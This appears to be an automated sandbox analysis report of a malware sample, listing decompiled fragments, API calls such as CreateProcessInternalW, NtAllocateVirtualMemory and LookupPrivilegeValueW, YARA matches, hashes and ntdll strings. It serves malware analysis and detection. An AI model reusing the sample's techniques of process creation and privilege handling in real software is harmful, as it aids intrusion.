                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                              • Instruction ID: 5f54135a6d5665afae9514b011c4f342711cdf5a633985feeb8d835705c457f1
                                                              • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                              • Instruction Fuzzy Hash: 98E012B1200208ABDB18EF99CC89EA777ACAF88750F018559FE085B242C630E914CAB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00418A60(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                              				int _t10;
                                                              				void* _t15;
                                                              
                                                              				E004191F0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                              				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                              				return _t10;
                                                              			}






                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID:
                                                              • API String ID: 3899507212-0
                                                              • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                              • Instruction ID: b5f2a6165515d53f35f5e56a9475d77ccb8deec25097a7d382054e427d326996
                                                              • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                              • Instruction Fuzzy Hash: 93E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FE0857242C934E8548BF5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418968
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.453689507.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Executed Functions

                                                              APIs
                                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,009C3BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,009C3BC7,007A002E,00000000,00000060,00000000,00000000), ref: 009C863D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID: .z`
                                                              • API String ID: 823142352-1441809116
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,009C3BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,009C3BC7,007A002E,00000000,00000060,00000000,00000000), ref: 009C863D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateFile
                                                              • String ID: .z`
                                                              • API String ID: 823142352-1441809116
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtReadFile.NTDLL(009C3D82,5E972F65,FFFFFFFF,009C3A41,?,?,009C3D82,?,009C3A41,FFFFFFFF,5E972F65,009C3D82,?,00000000), ref: 009C86E5
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtReadFile.NTDLL(009C3D82,5E972F65,FFFFFFFF,009C3A41,?,?,009C3D82,?,009C3A41,FFFFFFFF,5E972F65,009C3D82,?,00000000), ref: 009C86E5
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,009B2D11,00002000,00003000,00000004), ref: 009C8809
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,009B2D11,00002000,00003000,00000004), ref: 009C8809
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateMemoryVirtual
                                                              • String ID:
                                                              • API String ID: 2167126740-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtClose.NTDLL(009C3D60,?,?,009C3D60,00000000,FFFFFFFF), ref: 009C8745
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • NtClose.NTDLL(009C3D60,?,?,009C3D60,00000000,FFFFFFFF), ref: 009C8745
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • Sleep.KERNELBASE(000007D0), ref: 009C73B8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID: net.dll$wininet.dll
                                                              • API String ID: 3472027048-1269752229
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • Sleep.KERNELBASE(000007D0), ref: 009C73B8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID: net.dll$wininet.dll
                                                              • API String ID: 3472027048-1269752229
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,009B3B93), ref: 009C892D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID: .z`
                                                              • API String ID: 3298025750-1441809116
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,009B3B93), ref: 009C892D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID: .z`
                                                              • API String ID: 3298025750-1441809116
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 009B72EA
                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 009B730B
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 009B72EA
                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 009B730B
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,009BCFD2,009BCFD2,?,00000000,?,?), ref: 009C8A90
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID:
                                                              • API String ID: 3899507212-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 009B9BC2
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 009C89C4
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID:
                                                              • API String ID: 2186235152-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 009C89C4
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID:
                                                              • API String ID: 2186235152-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,009BCD00,?,?), ref: 009C747C
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID:
                                                              • API String ID: 2422867632-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,009BCD00,?,?), ref: 009C747C
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID:
                                                              • API String ID: 2422867632-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 009C89C4
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID:
                                                              • API String ID: 2186235152-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(009C3546,?,009C3CBF,009C3CBF,?,009C3546,?,?,?,?,?,00000000,00000000,?), ref: 009C88ED
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,009BCFD2,009BCFD2,?,00000000,?,?), ref: 009C8A90
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID:
                                                              • API String ID: 3899507212-0
                                                              • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                              • Instruction ID: f86a942eaece0d4b78fa9876149aa36c22f877b88e4136b2deb98a3f21f9464f
                                                              • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                              • Instruction Fuzzy Hash: E1E01AB1600208ABDB10DF49CC85FE737ADAF89750F018154BE0857242C930F8108BF5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00008003,?,?,009B7C93,?), ref: 009BD46B
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.617454019.00000000009B0000.00000040.00020000.sdmp, Offset: 009B0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                              • Instruction ID: 6c6bbe462396232eb3543801fb794e4fe5e0c4a9498ef087beb0596c3172ad96
                                                              • Opcode Fuzzy Hash: b859b7cae5d840821570f7fd72460b0c7ff461e09dfcff46a89307c648adf87c
                                                              • Instruction Fuzzy Hash: B1D0A7717503083BE610FAA89C03F6632CD5B44B10F498064F94DD73C3E960F5004161
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 0231d820ddc28237a743f818f011beb33deccdde3d07fea159bea001e7a7fb2b
                                                              • Instruction ID: b98f92faf314b027df27eb1c7d3d46f289821d567a706284f0d8ecb20c213443
                                                              • Opcode Fuzzy Hash: 0231d820ddc28237a743f818f011beb33deccdde3d07fea159bea001e7a7fb2b
                                                              • Instruction Fuzzy Hash: FFB09BB29014C5C5F715D7714A087377904F7D0745F16C0D5D1020655A4778D491F6B5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Strings
                                                              • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04C4B3D6
                                                              • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 04C4B476
                                                              • *** enter .exr %p for the exception record, xrefs: 04C4B4F1
                                                              • a NULL pointer, xrefs: 04C4B4E0
                                                              • The instruction at %p tried to %s , xrefs: 04C4B4B6
                                                              • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 04C4B53F
                                                              • *** A stack buffer overrun occurred in %ws:%s, xrefs: 04C4B2F3
                                                              • The resource is owned shared by %d threads, xrefs: 04C4B37E
                                                              • This failed because of error %Ix., xrefs: 04C4B446
                                                              • *** Resource timeout (%p) in %ws:%s, xrefs: 04C4B352
                                                              • Go determine why that thread has not released the critical section., xrefs: 04C4B3C5
                                                              • <unknown>, xrefs: 04C4B27E, 04C4B2D1, 04C4B350, 04C4B399, 04C4B417, 04C4B48E
                                                              • an invalid address, %p, xrefs: 04C4B4CF
                                                              • *** then kb to get the faulting stack, xrefs: 04C4B51C
                                                              • The instruction at %p referenced memory at %p., xrefs: 04C4B432
                                                              • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 04C4B323
                                                              • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 04C4B484
                                                              • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 04C4B39B
                                                              • write to, xrefs: 04C4B4A6
                                                              • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 04C4B2DC
                                                              • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 04C4B305
                                                              • *** enter .cxr %p for the context, xrefs: 04C4B50D
                                                              • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 04C4B47D
                                                              • The resource is owned exclusively by thread %p, xrefs: 04C4B374
                                                              • *** Inpage error in %ws:%s, xrefs: 04C4B418
                                                              • *** An Access Violation occurred in %ws:%s, xrefs: 04C4B48F
                                                              • The critical section is owned by thread %p., xrefs: 04C4B3B9
                                                              • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 04C4B38F
                                                              • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 04C4B314
                                                              • read from, xrefs: 04C4B4AD, 04C4B4B2
                                                              Memory Dump Source
                                                              • Source File: 0000000D.00000002.620584407.0000000004B70000.00000040.00000001.sdmp, Offset: 04B70000, based on PE: true
                                                              • Associated: 0000000D.00000002.621218149.0000000004C8B000.00000040.00000001.sdmp
                                                              • Associated: 0000000D.00000002.621265561.0000000004C8F000.00000040.00000001.sdmp
                                                              Similarity
                                                              • API ID:
                                                              • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                              • API String ID: 0-108210295
                                                              • Opcode ID: 6415d3be2a9be81f555f7549fec5aeda3a0b77ce09fd3a8ad233694ca8de9b7c
                                                              • Instruction ID: 3e457df2188a87d1cc78968e3cc540639175ca21a366a28f32fa6e9282a38ca6
                                                              • Opcode Fuzzy Hash: 6415d3be2a9be81f555f7549fec5aeda3a0b77ce09fd3a8ad233694ca8de9b7c
                                                              • Instruction Fuzzy Hash: BB810435A40210FFEB216A06CE45E7B3B2BEF86B55F044089F1046B162F6A1F911EB72
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 44%
                                                              			E04C51C06() {
                                                              				signed int _t27;
                                                              				char* _t104;
                                                              				char* _t105;
                                                              				intOrPtr _t113;
                                                              				intOrPtr _t115;
                                                              				intOrPtr _t117;
                                                              				intOrPtr _t119;
                                                              				intOrPtr _t120;
                                                              
                                                              				_t105 = 0x4b748a4;
                                                              				_t104 = "HEAP: ";
                                                              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                              					_push(_t104);
                                                              					E04B9B150();
                                                              				} else {
                                                              					E04B9B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                              				}
                                                              				_push( *0x4c8589c);
                                                              				E04B9B150("Heap error detected at %p (heap handle %p)\n",  *0x4c858a0);
                                                              				_t27 =  *0x4c85898; // 0x0
                                                              				if(_t27 <= 0xf) {
                                                              					switch( *((intOrPtr*)(_t27 * 4 +  &M04C51E96))) {
                                                              						case 0:
                                                              							_t105 = "heap_failure_internal";
                                                              							goto L21;
                                                              						case 1:
                                                              							goto L21;
                                                              						case 2:
                                                              							goto L21;
                                                              						case 3:
                                                              							goto L21;
                                                              						case 4:
                                                              							goto L21;
                                                              						case 5:
                                                              							goto L21;
                                                              						case 6:
                                                              							goto L21;
                                                              						case 7:
                                                              							goto L21;
                                                              						case 8:
                                                              							goto L21;
                                                              						case 9:
                                                              							goto L21;
                                                              						case 0xa:
                                                              							goto L21;
                                                              						case 0xb:
                                                              							goto L21;
                                                              						case 0xc:
                                                              							goto L21;
                                                              						case 0xd:
                                                              							goto L21;
                                                              						case 0xe:
                                                              							goto L21;
                                                              						case 0xf:
                                                              							goto L21;
                                                              					}
                                                              				}
                                                              				L21:
                                                              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                              					_push(_t104);
                                                              					E04B9B150();
                                                              				} else {
